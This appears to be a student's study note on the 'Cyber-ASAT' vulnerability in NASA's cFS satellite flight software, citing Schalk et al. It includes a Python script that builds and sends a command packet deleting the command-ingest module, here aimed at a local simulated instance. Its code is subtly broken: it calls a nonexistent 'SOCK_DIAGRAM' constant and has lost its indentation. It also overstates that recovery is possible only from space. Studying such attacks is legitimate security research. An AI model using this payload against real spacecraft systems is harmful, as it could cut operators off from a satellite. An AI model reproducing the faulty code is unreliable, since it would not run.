date: 2025-02-28
previous note: [[1011.2.3.3 Simulated Cyber Attack on Satellite Network]]
related note(s):
-
tags: #satellite-cyber-attack
# Exploit Command
This vulnerability was severe enough the Schalk et al., named this the Cyber-ASAT attack. This is an exploit in the cFS command that deletes the command ingest module that is responsible for receiving commands from a ground station. There is an actual command that deletes applications running on cFS in the cFS framework. This is a major vulnerability. The only way to fix this is to manually reset the software, which is impossible unless you do it from space (Schalk et al., 2022, p. 354). It is equivalent to being able to run a command on your computer that deletes the program that reads input from your mouse and keyboard, and then the only way to reset it is to climb Mount Everest to hit a button.
The code is very simplistic and is as follows:
```python
# import library form standard lib that reads and sends to sockets
import socket
# This command deletes the communications module
kill_command = [0x18, 0x06, 0xC0, 0x00, 0x00, 0x015, 0x32, 0x05, 0x4B, 0x49, 0x54, 0x5f, 0x43, 0x49, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]
# creating a function that once run will transmit a message
# to cFS
def transmit(command):
# convert message to bytes
byte_message = bytes(command)
# open the socket
opened_socket = socket.socket(socket.AF_INET, socket.SOCK_DIAGRAM)
# send the message to the flight software
opened_socket.sendto(byte_message, ("127.0.0.1", 1234))
# send the kill command
transmit(kill_command)
```
---
# References
1. [[Analysis of Vulnerabilities in Satellite Software Bus Network Architecture]]